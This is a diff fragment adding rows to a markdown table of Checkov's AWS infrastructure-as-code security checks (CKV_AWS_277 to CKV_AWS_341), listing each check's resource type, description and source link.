+|  694 | CKV_AWS_277              | resource                         | aws_security_group                                                                               | Ensure no security groups allow ingress from 0.0.0.0:0 to port -1                                                                                                                                        | Terraform               | [SecurityGroupUnrestrictedIngressAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngressAny.py)                                                         |
+|  695 | CKV_AWS_277              | resource                         | aws_security_group_rule                                                                          | Ensure no security groups allow ingress from 0.0.0.0:0 to port -1                                                                                                                                        | Terraform               | [SecurityGroupUnrestrictedIngressAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngressAny.py)                                                         |
+|  696 | CKV_AWS_277              | resource                         | aws_vpc_security_group_ingress_rule                                                              | Ensure no security groups allow ingress from 0.0.0.0:0 to port -1                                                                                                                                        | Terraform               | [SecurityGroupUnrestrictedIngressAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngressAny.py)                                                         |
+|  697 | CKV_AWS_278              | resource                         | aws_memorydb_snapshot                                                                            | Ensure MemoryDB snapshot is encrypted by KMS using a customer managed Key (CMK)                                                                                                                          | Terraform               | [MemoryDBSnapshotEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MemoryDBSnapshotEncryptionWithCMK.py)                                                             |
+|  698 | CKV_AWS_279              | resource                         | aws_neptune_cluster_snapshot                                                                     | Ensure Neptune snapshot is securely encrypted                                                                                                                                                            | Terraform               | [NeptuneClusterSnapshotEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneClusterSnapshotEncrypted.py)                                                                 |
+|  699 | CKV_AWS_280              | resource                         | aws_neptune_cluster_snapshot                                                                     | Ensure Neptune snapshot is encrypted by KMS using a customer managed Key (CMK)                                                                                                                           | Terraform               | [NeptuneClusterSnapshotEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneClusterSnapshotEncryptedWithCMK.py)                                                   |
+|  700 | CKV_AWS_281              | resource                         | aws_redshift_snapshot_copy_grant                                                                 | Ensure RedShift snapshot copy is encrypted by KMS using a customer managed Key (CMK)                                                                                                                     | Terraform               | [RedshiftClusterSnapshotCopyGrantEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterSnapshotCopyGrantEncryptedWithCMK.py)                               |
+|  701 | CKV_AWS_282              | resource                         | aws_redshiftserverless_namespace                                                                 | Ensure that Redshift Serverless namespace is encrypted by KMS using a customer managed key (CMK)                                                                                                         | Terraform               | [RedshiftServerlessNamespaceKMSKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftServerlessNamespaceKMSKey.py)                                                             |
+|  702 | CKV_AWS_283              | data                             | aws_iam_policy_document                                                                          | Ensure no IAM policies documents allow ALL or any AWS principal permissions to the resource                                                                                                              | Terraform               | [IAMPublicActionsPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/IAMPublicActionsPolicy.py)                                                                                       |
+|  703 | CKV_AWS_284              | resource                         | aws_sfn_state_machine                                                                            | Ensure State Machine has X-Ray tracing enabled                                                                                                                                                           | Terraform               | [StateMachineXray.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/StateMachineXray.py)                                                                                               |
+|  704 | CKV_AWS_285              | resource                         | aws_sfn_state_machine                                                                            | Ensure State Machine has execution history logging enabled                                                                                                                                               | Terraform               | [StateMachineLoggingExecutionHistory.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/StateMachineLoggingExecutionHistory.py)                                                         |
+|  705 | CKV_AWS_286              | resource                         | aws_iam_group_policy                                                                             | Ensure IAM policies does not allow privilege escalation                                                                                                                                                  | Terraform               | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPrivilegeEscalation.py)                                                                                   |
+|  706 | CKV_AWS_286              | resource                         | aws_iam_policy                                                                                   | Ensure IAM policies does not allow privilege escalation                                                                                                                                                  | Terraform               | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPrivilegeEscalation.py)                                                                                   |
+|  707 | CKV_AWS_286              | resource                         | aws_iam_role_policy                                                                              | Ensure IAM policies does not allow privilege escalation                                                                                                                                                  | Terraform               | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPrivilegeEscalation.py)                                                                                   |
+|  708 | CKV_AWS_286              | resource                         | aws_iam_user_policy                                                                              | Ensure IAM policies does not allow privilege escalation                                                                                                                                                  | Terraform               | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPrivilegeEscalation.py)                                                                                   |
+|  709 | CKV_AWS_286              | resource                         | aws_ssoadmin_permission_set_inline_policy                                                        | Ensure IAM policies does not allow privilege escalation                                                                                                                                                  | Terraform               | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPrivilegeEscalation.py)                                                                                   |
+|  710 | CKV_AWS_287              | resource                         | aws_iam_group_policy                                                                             | Ensure IAM policies does not allow credentials exposure                                                                                                                                                  | Terraform               | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMCredentialsExposure.py)                                                                                   |
+|  711 | CKV_AWS_287              | resource                         | aws_iam_policy                                                                                   | Ensure IAM policies does not allow credentials exposure                                                                                                                                                  | Terraform               | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMCredentialsExposure.py)                                                                                   |
+|  712 | CKV_AWS_287              | resource                         | aws_iam_role_policy                                                                              | Ensure IAM policies does not allow credentials exposure                                                                                                                                                  | Terraform               | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMCredentialsExposure.py)                                                                                   |
+|  713 | CKV_AWS_287              | resource                         | aws_iam_user_policy                                                                              | Ensure IAM policies does not allow credentials exposure                                                                                                                                                  | Terraform               | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMCredentialsExposure.py)                                                                                   |
+|  714 | CKV_AWS_287              | resource                         | aws_ssoadmin_permission_set_inline_policy                                                        | Ensure IAM policies does not allow credentials exposure                                                                                                                                                  | Terraform               | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMCredentialsExposure.py)                                                                                   |
+|  715 | CKV_AWS_288              | resource                         | aws_iam_group_policy                                                                             | Ensure IAM policies does not allow data exfiltration                                                                                                                                                     | Terraform               | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMDataExfiltration.py)                                                                                         |
+|  716 | CKV_AWS_288              | resource                         | aws_iam_policy                                                                                   | Ensure IAM policies does not allow data exfiltration                                                                                                                                                     | Terraform               | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMDataExfiltration.py)                                                                                         |
+|  717 | CKV_AWS_288              | resource                         | aws_iam_role_policy                                                                              | Ensure IAM policies does not allow data exfiltration                                                                                                                                                     | Terraform               | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMDataExfiltration.py)                                                                                         |
+|  718 | CKV_AWS_288              | resource                         | aws_iam_user_policy                                                                              | Ensure IAM policies does not allow data exfiltration                                                                                                                                                     | Terraform               | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMDataExfiltration.py)                                                                                         |
+|  719 | CKV_AWS_288              | resource                         | aws_ssoadmin_permission_set_inline_policy                                                        | Ensure IAM policies does not allow data exfiltration                                                                                                                                                     | Terraform               | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMDataExfiltration.py)                                                                                         |
+|  720 | CKV_AWS_289              | resource                         | aws_iam_group_policy                                                                             | Ensure IAM policies does not allow permissions management / resource exposure without constraints                                                                                                        | Terraform               | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPermissionsManagement.py)                                                                               |
+|  721 | CKV_AWS_289              | resource                         | aws_iam_policy                                                                                   | Ensure IAM policies does not allow permissions management / resource exposure without constraints                                                                                                        | Terraform               | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPermissionsManagement.py)                                                                               |
+|  722 | CKV_AWS_289              | resource                         | aws_iam_role_policy                                                                              | Ensure IAM policies does not allow permissions management / resource exposure without constraints                                                                                                        | Terraform               | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPermissionsManagement.py)                                                                               |
+|  723 | CKV_AWS_289              | resource                         | aws_iam_user_policy                                                                              | Ensure IAM policies does not allow permissions management / resource exposure without constraints                                                                                                        | Terraform               | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPermissionsManagement.py)                                                                               |
+|  724 | CKV_AWS_289              | resource                         | aws_ssoadmin_permission_set_inline_policy                                                        | Ensure IAM policies does not allow permissions management / resource exposure without constraints                                                                                                        | Terraform               | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPermissionsManagement.py)                                                                               |
+|  725 | CKV_AWS_290              | resource                         | aws_iam_group_policy                                                                             | Ensure IAM policies does not allow write access without constraints                                                                                                                                      | Terraform               | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMWriteAccess.py)                                                                                                   |
+|  726 | CKV_AWS_290              | resource                         | aws_iam_policy                                                                                   | Ensure IAM policies does not allow write access without constraints                                                                                                                                      | Terraform               | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMWriteAccess.py)                                                                                                   |
+|  727 | CKV_AWS_290              | resource                         | aws_iam_role_policy                                                                              | Ensure IAM policies does not allow write access without constraints                                                                                                                                      | Terraform               | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMWriteAccess.py)                                                                                                   |
+|  728 | CKV_AWS_290              | resource                         | aws_iam_user_policy                                                                              | Ensure IAM policies does not allow write access without constraints                                                                                                                                      | Terraform               | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMWriteAccess.py)                                                                                                   |
+|  729 | CKV_AWS_290              | resource                         | aws_ssoadmin_permission_set_inline_policy                                                        | Ensure IAM policies does not allow write access without constraints                                                                                                                                      | Terraform               | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMWriteAccess.py)                                                                                                   |
+|  730 | CKV_AWS_291              | resource                         | AWS::MSK::Cluster                                                                                | Ensure MSK nodes are private                                                                                                                                                                             | Cloudformation          | [MSKClusterNodesArePrivate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/MSKClusterNodesArePrivate.py)                                                                        |
+|  731 | CKV_AWS_291              | resource                         | aws_msk_cluster                                                                                  | Ensure MSK nodes are private                                                                                                                                                                             | Terraform               | [MSKClusterNodesArePrivate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MSKClusterNodesArePrivate.py)                                                                             |
+|  732 | CKV_AWS_292              | resource                         | aws_docdb_global_cluster                                                                         | Ensure DocumentDB Global Cluster is encrypted at rest (default is unencrypted)                                                                                                                           | Terraform               | [DocDBGlobalClusterEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DocDBGlobalClusterEncryption.py)                                                                       |
+|  733 | CKV_AWS_293              | resource                         | aws_db_instance                                                                                  | Ensure that AWS database instances have deletion protection enabled                                                                                                                                      | Terraform               | [RDSInstanceDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSInstanceDeletionProtection.py)                                                                     |
+|  734 | CKV_AWS_294              | resource                         | aws_cloudtrail_event_data_store                                                                  | Ensure CloudTrail Event Data Store uses CMK                                                                                                                                                              | Terraform               | [CloudtrailEventDataStoreUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudtrailEventDataStoreUsesCMK.py)                                                                 |
+|  735 | CKV_AWS_295              | resource                         | aws_datasync_location_object_storage                                                             | Ensure DataSync Location Object Storage doesn't expose secrets                                                                                                                                           | Terraform               | [DatasyncLocationExposesSecrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DatasyncLocationExposesSecrets.py)                                                                   |
+|  736 | CKV_AWS_296              | resource                         | aws_dms_endpoint                                                                                 | Ensure DMS endpoint uses Customer Managed Key (CMK)                                                                                                                                                      | Terraform               | [DMSEndpointUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DMSEndpointUsesCMK.py)                                                                                           |
+|  737 | CKV_AWS_297              | resource                         | aws_scheduler_schedule                                                                           | Ensure EventBridge Scheduler Schedule uses Customer Managed Key (CMK)                                                                                                                                    | Terraform               | [SchedulerScheduleUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SchedulerScheduleUsesCMK.py)                                                                               |
+|  738 | CKV_AWS_298              | resource                         | aws_dms_s3_endpoint                                                                              | Ensure DMS S3 uses Customer Managed Key (CMK)                                                                                                                                                            | Terraform               | [DMSS3UsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DMSS3UsesCMK.py)                                                                                                       |
+|  739 | CKV_AWS_300              | resource                         | aws_s3_bucket_lifecycle_configuration                                                            | Ensure S3 lifecycle configuration sets period for aborting failed uploads                                                                                                                                | Terraform               | [S3AbortIncompleteUploads.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3AbortIncompleteUploads.py)                                                                               |
+|  740 | CKV_AWS_301              | resource                         | aws_lambda_permission                                                                            | Ensure that AWS Lambda function is not publicly accessible                                                                                                                                               | Terraform               | [LambdaFunctionIsNotPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaFunctionIsNotPublic.py)                                                                             |
+|  741 | CKV_AWS_302              | resource                         | aws_db_snapshot                                                                                  | Ensure DB Snapshots are not Public                                                                                                                                                                       | Terraform               | [DBSnapshotsArePrivate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DBSnapshotsArePrivate.py)                                                                                     |
+|  742 | CKV_AWS_303              | resource                         | aws_ssm_document                                                                                 | Ensure SSM documents are not Public                                                                                                                                                                      | Terraform               | [SSMDocumentsArePrivate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SSMDocumentsArePrivate.py)                                                                                   |
+|  743 | CKV_AWS_304              | resource                         | aws_secretsmanager_secret_rotation                                                               | Ensure Secrets Manager secrets should be rotated within 90 days                                                                                                                                          | Terraform               | [SecretManagerSecret90days.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecretManagerSecret90days.py)                                                                             |
+|  744 | CKV_AWS_305              | resource                         | aws_cloudfront_distribution                                                                      | Ensure CloudFront distribution has a default root object configured                                                                                                                                      | Terraform               | [CloudfrontDistributionDefaultRoot.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudfrontDistributionDefaultRoot.py)                                                             |
+|  745 | CKV_AWS_306              | resource                         | aws_sagemaker_notebook_instance                                                                  | Ensure SageMaker notebook instances should be launched into a custom VPC                                                                                                                                 | Terraform               | [SagemakerNotebookInCustomVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SagemakerNotebookInCustomVPC.py)                                                                       |
+|  746 | CKV_AWS_307              | resource                         | aws_sagemaker_notebook_instance                                                                  | Ensure SageMaker Users should not have root access to SageMaker notebook instances                                                                                                                       | Terraform               | [SagemakerNotebookRoot.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SagemakerNotebookRoot.py)                                                                                     |
+|  747 | CKV_AWS_308              | resource                         | aws_api_gateway_method_settings                                                                  | Ensure API Gateway method setting caching is set to encrypted                                                                                                                                            | Terraform               | [APIGatewayMethodSettingsCacheEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayMethodSettingsCacheEncrypted.py)                                                   |
+|  748 | CKV_AWS_309              | resource                         | aws_apigatewayv2_route                                                                           | Ensure API GatewayV2 routes specify an authorization type                                                                                                                                                | Terraform               | [APIGatewayV2RouteDefinesAuthorizationType.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayV2RouteDefinesAuthorizationType.py)                                             |
+|  749 | CKV_AWS_310              | resource                         | aws_cloudfront_distribution                                                                      | Ensure CloudFront distributions should have origin failover configured                                                                                                                                   | Terraform               | [CloudfrontDistributionOriginFailover.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudfrontDistributionOriginFailover.py)                                                       |
+|  750 | CKV_AWS_311              | resource                         | aws_codebuild_project                                                                            | Ensure that CodeBuild S3 logs are encrypted                                                                                                                                                              | Terraform               | [CodebuildS3LogsEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodebuildS3LogsEncrypted.py)                                                                               |
+|  751 | CKV_AWS_312              | resource                         | aws_elastic_beanstalk_environment                                                                | Ensure Elastic Beanstalk environments have enhanced health reporting enabled                                                                                                                             | Terraform               | [ElasticBeanstalkUseEnhancedHealthChecks.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticBeanstalkUseEnhancedHealthChecks.py)                                                 |
+|  752 | CKV_AWS_313              | resource                         | aws_rds_cluster                                                                                  | Ensure RDS cluster configured to copy tags to snapshots                                                                                                                                                  | Terraform               | [RDSClusterCopyTags.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterCopyTags.py)                                                                                           |
+|  753 | CKV_AWS_314              | resource                         | aws_codebuild_project                                                                            | Ensure CodeBuild project environments have a logging configuration                                                                                                                                       | Terraform               | [CodebuildHasLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodebuildHasLogs.py)                                                                                               |
+|  754 | CKV_AWS_315              | resource                         | aws_autoscaling_group                                                                            | Ensure EC2 Auto Scaling groups use EC2 launch templates                                                                                                                                                  | Terraform               | [AutoScalingLaunchTemplate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AutoScalingLaunchTemplate.py)                                                                             |
+|  755 | CKV_AWS_316              | resource                         | aws_codebuild_project                                                                            | Ensure CodeBuild project environments do not have privileged mode enabled                                                                                                                                | Terraform               | [CodeBuildPrivilegedMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodeBuildPrivilegedMode.py)                                                                                 |
+|  756 | CKV_AWS_317              | resource                         | AWS::Elasticsearch::Domain                                                                       | Ensure Elasticsearch Domain Audit Logging is enabled                                                                                                                                                     | Cloudformation          | [ElasticsearchDomainAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticsearchDomainAuditLogging.py)                                                            |
+|  757 | CKV_AWS_317              | resource                         | AWS::OpenSearchService::Domain                                                                   | Ensure Elasticsearch Domain Audit Logging is enabled                                                                                                                                                     | Cloudformation          | [ElasticsearchDomainAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticsearchDomainAuditLogging.py)                                                            |
+|  758 | CKV_AWS_317              | resource                         | aws_elasticsearch_domain                                                                         | Ensure Elasticsearch Domain Audit Logging is enabled                                                                                                                                                     | Terraform               | [ElasticsearchDomainAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainAuditLogging.py)                                                                 |
+|  759 | CKV_AWS_317              | resource                         | aws_opensearch_domain                                                                            | Ensure Elasticsearch Domain Audit Logging is enabled                                                                                                                                                     | Terraform               | [ElasticsearchDomainAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainAuditLogging.py)                                                                 |
+|  760 | CKV_AWS_318              | resource                         | aws_elasticsearch_domain                                                                         | Ensure Elasticsearch domains are configured with at least three dedicated master nodes for HA                                                                                                            | Terraform               | [ElasticsearchDomainHA.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainHA.py)                                                                                     |
+|  761 | CKV_AWS_318              | resource                         | aws_opensearch_domain                                                                            | Ensure Elasticsearch domains are configured with at least three dedicated master nodes for HA                                                                                                            | Terraform               | [ElasticsearchDomainHA.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainHA.py)                                                                                     |
+|  762 | CKV_AWS_319              | resource                         | aws_cloudwatch_metric_alarm                                                                      | Ensure that CloudWatch alarm actions are enabled                                                                                                                                                         | Terraform               | [CloudWatchAlarmsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudWatchAlarmsEnabled.py)                                                                                 |
+|  763 | CKV_AWS_320              | resource                         | aws_redshift_cluster                                                                             | Ensure Redshift clusters do not use the default database name                                                                                                                                            | Terraform               | [RedshiftClusterDatabaseName.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterDatabaseName.py)                                                                         |
+|  764 | CKV_AWS_321              | resource                         | aws_redshift_cluster                                                                             | Ensure Redshift clusters use enhanced VPC routing                                                                                                                                                        | Terraform               | [RedshiftClusterUseEnhancedVPCRouting.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterUseEnhancedVPCRouting.py)                                                       |
+|  765 | CKV_AWS_322              | resource                         | aws_elasticache_cluster                                                                          | Ensure ElastiCache for Redis cache clusters have auto minor version upgrades enabled                                                                                                                     | Terraform               | [ElasticCacheAutomaticMinorUpgrades.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticCacheAutomaticMinorUpgrades.py)                                                           |
+|  766 | CKV_AWS_323              | resource                         | aws_elasticache_cluster                                                                          | Ensure ElastiCache clusters do not use the default subnet group                                                                                                                                          | Terraform               | [ElastiCacheHasCustomSubnet.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElastiCacheHasCustomSubnet.py)                                                                           |
+|  767 | CKV_AWS_324              | resource                         | aws_rds_cluster                                                                                  | Ensure that RDS Cluster log capture is enabled                                                                                                                                                           | Terraform               | [RDSClusterLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterLogging.py)                                                                                             |
+|  768 | CKV_AWS_325              | resource                         | aws_rds_cluster                                                                                  | Ensure that RDS Cluster audit logging is enabled for MySQL engine                                                                                                                                        | Terraform               | [RDSClusterAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterAuditLogging.py)                                                                                   |
+|  769 | CKV_AWS_326              | resource                         | aws_rds_cluster                                                                                  | Ensure that RDS Aurora Clusters have backtracking enabled                                                                                                                                                | Terraform               | [RDSClusterAuroraBacktrack.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterAuroraBacktrack.py)                                                                             |
+|  770 | CKV_AWS_327              | resource                         | aws_rds_cluster                                                                                  | Ensure RDS Clusters are encrypted using KMS CMKs                                                                                                                                                         | Terraform               | [RDSClusterEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterEncryptedWithCMK.py)                                                                           |
+|  771 | CKV_AWS_328              | resource                         | aws_alb                                                                                          | Ensure that ALB is configured with defensive or strictest desync mitigation mode                                                                                                                         | Terraform               | [ALBDesyncMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ALBDesyncMode.py)                                                                                                     |
+|  772 | CKV_AWS_328              | resource                         | aws_elb                                                                                          | Ensure that ALB is configured with defensive or strictest desync mitigation mode                                                                                                                         | Terraform               | [ALBDesyncMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ALBDesyncMode.py)                                                                                                     |
+|  773 | CKV_AWS_328              | resource                         | aws_lb                                                                                           | Ensure that ALB is configured with defensive or strictest desync mitigation mode                                                                                                                         | Terraform               | [ALBDesyncMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ALBDesyncMode.py)                                                                                                     |
+|  774 | CKV_AWS_329              | resource                         | aws_efs_access_point                                                                             | EFS access points should enforce a root directory                                                                                                                                                        | Terraform               | [EFSAccessPointRoot.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EFSAccessPointRoot.py)                                                                                           |
+|  775 | CKV_AWS_330              | resource                         | aws_efs_access_point                                                                             | EFS access points should enforce a user identity                                                                                                                                                         | Terraform               | [EFSAccessUserIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EFSAccessUserIdentity.py)                                                                                     |
+|  776 | CKV_AWS_331              | resource                         | aws_ec2_transit_gateway                                                                          | Ensure Transit Gateways do not automatically accept VPC attachment requests                                                                                                                              | Terraform               | [Ec2TransitGatewayAutoAccept.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/Ec2TransitGatewayAutoAccept.py)                                                                         |
+|  777 | CKV_AWS_332              | resource                         | aws_ecs_service                                                                                  | Ensure ECS Fargate services run on the latest Fargate platform version                                                                                                                                   | Terraform               | [ECSServiceFargateLatest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSServiceFargateLatest.py)                                                                                 |
+|  778 | CKV_AWS_333              | resource                         | aws_ecs_service                                                                                  | Ensure ECS services do not have public IP addresses assigned to them automatically                                                                                                                       | Terraform               | [ECSServicePublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSServicePublicIP.py)                                                                                           |
+|  779 | CKV_AWS_334              | resource                         | aws_ecs_task_definition                                                                          | Ensure ECS containers should run as non-privileged                                                                                                                                                       | Terraform               | [ECSContainerPrivilege.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSContainerPrivilege.py)                                                                                     |
+|  780 | CKV_AWS_335              | resource                         | aws_ecs_task_definition                                                                          | Ensure ECS task definitions should not share the host's process namespace                                                                                                                                | Terraform               | [ECSContainerHostProcess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSContainerHostProcess.py)                                                                                 |
+|  781 | CKV_AWS_336              | resource                         | aws_ecs_task_definition                                                                          | Ensure ECS containers are limited to read-only access to root filesystems                                                                                                                                | Terraform               | [ECSContainerReadOnlyRoot.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSContainerReadOnlyRoot.py)                                                                               |
+|  782 | CKV_AWS_337              | resource                         | aws_ssm_parameter                                                                                | Ensure SSM parameters are using KMS CMK                                                                                                                                                                  | Terraform               | [SSMParameterUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SSMParameterUsesCMK.py)                                                                                         |
+|  783 | CKV_AWS_338              | resource                         | aws_cloudwatch_log_group                                                                         | Ensure CloudWatch log groups retains logs for at least 1 year                                                                                                                                            | Terraform               | [CloudWatchLogGroupRetentionYear.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudWatchLogGroupRetentionYear.py)                                                                 |
+|  784 | CKV_AWS_339              | resource                         | aws_eks_cluster                                                                                  | Ensure EKS clusters run on a supported Kubernetes version                                                                                                                                                | Terraform               | [EKSPlatformVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EKSPlatformVersion.py)                                                                                           |
+|  785 | CKV_AWS_340              | resource                         | aws_elastic_beanstalk_environment                                                                | Ensure Elastic Beanstalk managed platform updates are enabled                                                                                                                                            | Terraform               | [ElasticBeanstalkUseManagedUpdates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticBeanstalkUseManagedUpdates.py)                                                             |
+|  786 | CKV_AWS_341              | resource                         | aws_launch_configuration                                                                         | Ensure Launch template should not have a metadata response hop limit greater than 1                                                                                                                      | Terraform               | [LaunchTemplateMetadataHop.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LaunchTemplateMetadataHop.py)                                                                             |
